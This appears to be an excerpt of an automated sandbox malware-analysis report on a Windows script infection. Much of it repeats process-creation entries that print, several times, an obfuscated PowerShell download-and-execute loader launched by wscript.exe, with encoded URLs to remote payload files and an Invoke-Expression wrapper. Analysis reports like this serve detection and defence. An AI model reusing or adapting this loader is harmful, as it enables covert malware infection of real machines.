              Source: wscript.exe, 00000000.00000003.2134686892.0000021ADDB6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
              Source: wscript.exe, 00000000.00000003.2134686892.0000021ADDB6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7N
              Source: powershell.exe, 00000003.00000002.3438249100.00000266D7812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C9D6E0 LdrInitializeThunk,LdrInitializeThunk,7_2_04C9D6E0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_1600.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afrikaans='substr';$semiprofanity26++;}$afrikaans+='ing';function konstruktive($metaludlser){$arbejdernederlaget=$metaludlser.length-$semiprofanity26;for( $outlimn=4;$outlimn -lt $arbejdernederlaget;$outlimn+=5){$junking+=$metaludlser.$afrikaans.'invoke'( $outlimn, $semiprofanity26);}$junking;}function kreditorselskabs($programeksempler){ . ($ecumenicalism) ($programeksempler);}$blyindholds=konstruktive 'atlamimmoodiamz eneiaabelquitlcasuaau,i/ res5,uma.seas0uroc con(curiw eveiemainsu idfiskotelews,odspeng medln ,umtgale bomb1cone0c.ff.adj 0incu;pa.t is,ewbyggi.ndfneffe6rel.4 sp,;b.tt ,uggxgome6ency4 unc;fuci unhar appv nch: uja1semi2dayf1opri.solu0awni)tr.l etikgungieheavcsmukkenfootors/skjo2tppe0hall1 bio0glid0batt1gast0sa,g1osmi do fsuggioplyr skrepachf andobavixresc/ mlk1for 2sort1vris.skum0shel ';$begazes=konstruktive 'pr.sua resec ies unre.tl-svamatevagplo ef,ern .uvtfu d ';$ideogrammerne=konstruktive ' s,ahovert inatudjvprestsbyst:fin /fer,/ma,tadiffdhugojnonrusew,nlytetmeloi eftastre.mustrdi.kumu,i.for,cgil.otoilms ur/p.rtwnedspunob-gonaisnornklimc fodlstyruspard ,coecystssnek/ga gisolam intgb,op/,utsaretsptrempbroolombyio.spa ln.nhum.c ge ehomesblod.makrspe,rmbeskigeni>nat,hde itdecatbolspdeessspol:,upe/inco/unmoal,esmruddbme ny penv onoespadrsnd ctranegr.n.bac,cforloforsm med/auteashempjawfpfoehl c.ri fe,asyrln quicanstea.iosbich.pennspaabm doli or ';$toddyskes=konstruktive 'a,um> tra ';$ecumenicalism=konstruktive 'e asik.lledomix ilr ';$drsprkkernes='nonnutritiousness';$telemestre = konstruktive 'opsae ovec inrhl,tco se, con%om rad.umpsvvepafstdhuipa ratthermacel.% opn\bogbsdiskpfrili blisoad ek.llf sneiinv skok,kuret.precp ,anuharlr erb fejl&ta p&hege ky.ienonec vedhi.veou,de prot li. ';kreditorselskabs (konstruktive 'inde$contgma cludeloregabroseaambrl gra:.iroakalinletvfmembldigiycituvklapnamniigtefnfla,gvand=genn(turtcblommoctadsym, b eb/bicecanni un.e$nitet rh.etea.lb.dre betm o.vefortssviptordlr an.edr n)unsl ');kreditorselskabs (konstruktive 'blan$ferrg,uthlu.saojejub,nigac.rnlfind:resovs nnec,anntriqavingl,inennoneecouns orfsskif=apos$posti ,aadren,esummobarngpilar banade.ema,famfoure skyr syln soaemult. g,asbrdrpomarlin.oi udbtradi(sten$napktfjero ,ysdmambdoverysacespcflklivieaktusant.)strb ');kreditorselskabs (konstruktive 'frug[ ilunvejre p.utb.tr.folksstope mycrmariven,yiprfactraneartip o.sosammijernndicetneo mak,iaexpln benahaang brne,sparstt,]figu: ene:bortsretse ovic k,aulater .iviassetvelgysmerp braroverogloptvanqoun.acblowosamslpetr me,l=fane t k[benznguare .iptnonv.fienska eeforscprolup ftrgaloi solt desy osepsl.nrcarboskurtcoroof,rsc polokl,alnat.tregny racpvaadespin]f,ti:kine:smkktplanlcakesdarw1ana,2over ');$ideogrammerne=$venalness[0];$pickett= (konstruktive 'palf$ skogfraclcou ohospbteraadelilbrud:savokaffao habn p.lk s.uu vakr.seurgl.ne chansemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afrikaans='substr';$semiprofanity26++;}$afrikaans+='ing';function konstruktive($metaludlser){$arbejdernederlaget=$metaludlser.length-$semiprofanity26;for( $outlimn=4;$outlimn -lt $arbejdernederlaget;$outlimn+=5){$junking+=$metaludlser.$afrikaans.'invoke'( $outlimn, $semiprofanity26);}$junking;}function kreditorselskabs($programeksempler){ . ($ecumenicalism) ($programeksempler);}$blyindholds=konstruktive 'atlamimmoodiamz eneiaabelquitlcasuaau,i/ res5,uma.seas0uroc con(curiw eveiemainsu idfiskotelews,odspeng medln ,umtgale bomb1cone0c.ff.adj 0incu;pa.t is,ewbyggi.ndfneffe6rel.4 sp,;b.tt ,uggxgome6ency4 unc;fuci unhar appv nch: uja1semi2dayf1opri.solu0awni)tr.l etikgungieheavcsmukkenfootors/skjo2tppe0hall1 bio0glid0batt1gast0sa,g1osmi do fsuggioplyr skrepachf andobavixresc/ mlk1for 2sort1vris.skum0shel ';$begazes=konstruktive 'pr.sua resec ies unre.tl-svamatevagplo ef,ern .uvtfu d ';$ideogrammerne=konstruktive ' s,ahovert inatudjvprestsbyst:fin /fer,/ma,tadiffdhugojnonrusew,nlytetmeloi eftastre.mustrdi.kumu,i.for,cgil.otoilms ur/p.rtwnedspunob-gonaisnornklimc fodlstyruspard ,coecystssnek/ga gisolam intgb,op/,utsaretsptrempbroolombyio.spa ln.nhum.c ge ehomesblod.makrspe,rmbeskigeni>nat,hde itdecatbolspdeessspol:,upe/inco/unmoal,esmruddbme ny penv onoespadrsnd ctranegr.n.bac,cforloforsm med/auteashempjawfpfoehl c.ri fe,asyrln quicanstea.iosbich.pennspaabm doli or ';$toddyskes=konstruktive 'a,um> tra ';$ecumenicalism=konstruktive 'e asik.lledomix ilr ';$drsprkkernes='nonnutritiousness';$telemestre = konstruktive 'opsae ovec inrhl,tco se, con%om rad.umpsvvepafstdhuipa ratthermacel.% opn\bogbsdiskpfrili blisoad ek.llf sneiinv skok,kuret.precp ,anuharlr erb fejl&ta p&hege ky.ienonec vedhi.veou,de prot li. ';kreditorselskabs (konstruktive 'inde$contgma cludeloregabroseaambrl gra:.iroakalinletvfmembldigiycituvklapnamniigtefnfla,gvand=genn(turtcblommoctadsym, b eb/bicecanni un.e$nitet rh.etea.lb.dre betm o.vefortssviptordlr an.edr n)unsl ');kreditorselskabs (konstruktive 'blan$ferrg,uthlu.saojejub,nigac.rnlfind:resovs nnec,anntriqavingl,inennoneecouns orfsskif=apos$posti ,aadren,esummobarngpilar banade.ema,famfoure skyr syln soaemult. g,asbrdrpomarlin.oi udbtradi(sten$napktfjero ,ysdmambdoverysacespcflklivieaktusant.)strb ');kreditorselskabs (konstruktive 'frug[ ilunvejre p.utb.tr.folksstope mycrmariven,yiprfactraneartip o.sosammijernndicetneo mak,iaexpln benahaang brne,sparstt,]figu: ene:bortsretse ovic k,aulater .iviassetvelgysmerp braroverogloptvanqoun.acblowosamslpetr me,l=fane t k[benznguare .iptnonv.fienska eeforscprolup ftrgaloi solt desy osepsl.nrcarboskurtcoroof,rsc polokl,alnat.tregny racpvaadespin]f,ti:kine:smkktplanlcakesdarw1ana,2over ');$ideogrammerne=$venalness[0];$pickett= (konstruktive 'palf$ skogfraclcou ohospbteraadelilbrud:savokaffao habn p.lk s.uu vakr.seurgl.ne chansemic
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afrikaans='substr';$semiprofanity26++;}$afrikaans+='ing';function konstruktive($metaludlser){$arbejdernederlaget=$metaludlser.length-$semiprofanity26;for( $outlimn=4;$outlimn -lt $arbejdernederlaget;$outlimn+=5){$junking+=$metaludlser.$afrikaans.'invoke'( $outlimn, $semiprofanity26);}$junking;}function kreditorselskabs($programeksempler){ . ($ecumenicalism) ($programeksempler);}$blyindholds=konstruktive 'atlamimmoodiamz eneiaabelquitlcasuaau,i/ res5,uma.seas0uroc con(curiw eveiemainsu idfiskotelews,odspeng medln ,umtgale bomb1cone0c.ff.adj 0incu;pa.t is,ewbyggi.ndfneffe6rel.4 sp,;b.tt ,uggxgome6ency4 unc;fuci unhar appv nch: uja1semi2dayf1opri.solu0awni)tr.l etikgungieheavcsmukkenfootors/skjo2tppe0hall1 bio0glid0batt1gast0sa,g1osmi do fsuggioplyr skrepachf andobavixresc/ mlk1for 2sort1vris.skum0shel ';$begazes=konstruktive 'pr.sua resec ies unre.tl-svamatevagplo ef,ern .uvtfu d ';$ideogrammerne=konstruktive ' s,ahovert inatudjvprestsbyst:fin /fer,/ma,tadiffdhugojnonrusew,nlytetmeloi eftastre.mustrdi.kumu,i.for,cgil.otoilms ur/p.rtwnedspunob-gonaisnornklimc fodlstyruspard ,coecystssnek/ga gisolam intgb,op/,utsaretsptrempbroolombyio.spa ln.nhum.c ge ehomesblod.makrspe,rmbeskigeni>nat,hde itdecatbolspdeessspol:,upe/inco/unmoal,esmruddbme ny penv onoespadrsnd ctranegr.n.bac,cforloforsm med/auteashempjawfpfoehl c.ri fe,asyrln quicanstea.iosbich.pennspaabm doli or ';$toddyskes=konstruktive 'a,um> tra ';$ecumenicalism=konstruktive 'e asik.lledomix ilr ';$drsprkkernes='nonnutritiousness';$telemestre = konstruktive 'opsae ovec inrhl,tco se, con%om rad.umpsvvepafstdhuipa ratthermacel.% opn\bogbsdiskpfrili blisoad ek.llf sneiinv skok,kuret.precp ,anuharlr erb fejl&ta p&hege ky.ienonec vedhi.veou,de prot li. ';kreditorselskabs (konstruktive 'inde$contgma cludeloregabroseaambrl gra:.iroakalinletvfmembldigiycituvklapnamniigtefnfla,gvand=genn(turtcblommoctadsym, b eb/bicecanni un.e$nitet rh.etea.lb.dre betm o.vefortssviptordlr an.edr n)unsl ');kreditorselskabs (konstruktive 'blan$ferrg,uthlu.saojejub,nigac.rnlfind:resovs nnec,anntriqavingl,inennoneecouns orfsskif=apos$posti ,aadren,esummobarngpilar banade.ema,famfoure skyr syln soaemult. g,asbrdrpomarlin.oi udbtradi(sten$napktfjero ,ysdmambdoverysacespcflklivieaktusant.)strb ');kreditorselskabs (konstruktive 'frug[ ilunvejre p.utb.tr.folksstope mycrmariven,yiprfactraneartip o.sosammijernndicetneo mak,iaexpln benahaang brne,sparstt,]figu: ene:bortsretse ovic k,aulater .iviassetvelgysmerp braroverogloptvanqoun.acblowosamslpetr me,l=fane t k[benznguare .iptnonv.fienska eeforscprolup ftrgaloi solt desy osepsl.nrcarboskurtcoroof,rsc polokl,alnat.tregny racpvaadespin]f,ti:kine:smkktplanlcakesdarw1ana,2over ');$ideogrammerne=$venalness[0];$pickett= (konstruktive 'palf$ skogfraclcou ohospbteraadelilbrud:savokaffao habn p.lk s.uu vakr.seurgl.ne chansemicJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afrikaans='substr';$semiprofanity26++;}$afrikaans+='ing';function konstruktive($metaludlser){$arbejdernederlaget=$metaludlser.length-$semiprofanity26;for( $outlimn=4;$outlimn -lt $arbejdernederlaget;$outlimn+=5){$junking+=$metaludlser.$afrikaans.'invoke'( $outlimn, $semiprofanity26);}$junking;}function kreditorselskabs($programeksempler){ . ($ecumenicalism) ($programeksempler);}$blyindholds=konstruktive 'atlamimmoodiamz eneiaabelquitlcasuaau,i/ res5,uma.seas0uroc con(curiw eveiemainsu idfiskotelews,odspeng medln ,umtgale bomb1cone0c.ff.adj 0incu;pa.t is,ewbyggi.ndfneffe6rel.4 sp,;b.tt ,uggxgome6ency4 unc;fuci unhar appv nch: uja1semi2dayf1opri.solu0awni)tr.l etikgungieheavcsmukkenfootors/skjo2tppe0hall1 bio0glid0batt1gast0sa,g1osmi do fsuggioplyr skrepachf andobavixresc/ mlk1for 2sort1vris.skum0shel ';$begazes=konstruktive 'pr.sua resec ies unre.tl-svamatevagplo ef,ern .uvtfu d ';$ideogrammerne=konstruktive ' s,ahovert inatudjvprestsbyst:fin /fer,/ma,tadiffdhugojnonrusew,nlytetmeloi eftastre.mustrdi.kumu,i.for,cgil.otoilms ur/p.rtwnedspunob-gonaisnornklimc fodlstyruspard ,coecystssnek/ga gisolam intgb,op/,utsaretsptrempbroolombyio.spa ln.nhum.c ge ehomesblod.makrspe,rmbeskigeni>nat,hde itdecatbolspdeessspol:,upe/inco/unmoal,esmruddbme ny penv onoespadrsnd ctranegr.n.bac,cforloforsm med/auteashempjawfpfoehl c.ri fe,asyrln quicanstea.iosbich.pennspaabm doli or ';$toddyskes=konstruktive 'a,um> tra ';$ecumenicalism=konstruktive 'e asik.lledomix ilr ';$drsprkkernes='nonnutritiousness';$telemestre = konstruktive 'opsae ovec inrhl,tco se, con%om rad.umpsvvepafstdhuipa ratthermacel.% opn\bogbsdiskpfrili blisoad ek.llf sneiinv skok,kuret.precp ,anuharlr erb fejl&ta p&hege ky.ienonec vedhi.veou,de prot li. ';kreditorselskabs (konstruktive 'inde$contgma cludeloregabroseaambrl gra:.iroakalinletvfmembldigiycituvklapnamniigtefnfla,gvand=genn(turtcblommoctadsym, b eb/bicecanni un.e$nitet rh.etea.lb.dre betm o.vefortssviptordlr an.edr n)unsl ');kreditorselskabs (konstruktive 'blan$ferrg,uthlu.saojejub,nigac.rnlfind:resovs nnec,anntriqavingl,inennoneecouns orfsskif=apos$posti ,aadren,esummobarngpilar banade.ema,famfoure skyr syln soaemult. g,asbrdrpomarlin.oi udbtradi(sten$napktfjero ,ysdmambdoverysacespcflklivieaktusant.)strb ');kreditorselskabs (konstruktive 'frug[ ilunvejre p.utb.tr.folksstope mycrmariven,yiprfactraneartip o.sosammijernndicetneo mak,iaexpln benahaang brne,sparstt,]figu: ene:bortsretse ovic k,aulater .iviassetvelgysmerp braroverogloptvanqoun.acblowosamslpetr me,l=fane t k[benznguare .iptnonv.fienska eeforscprolup ftrgaloi solt desy osepsl.nrcarboskurtcoroof,rsc polokl,alnat.tregny racpvaadespin]f,ti:kine:smkktplanlcakesdarw1ana,2over ');$ideogrammerne=$venalness[0];$pickett= (konstruktive 'palf$ skogfraclcou ohospbteraadelilbrud:savokaffao habn p.lk s.uu vakr.seurgl.ne chansemicJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
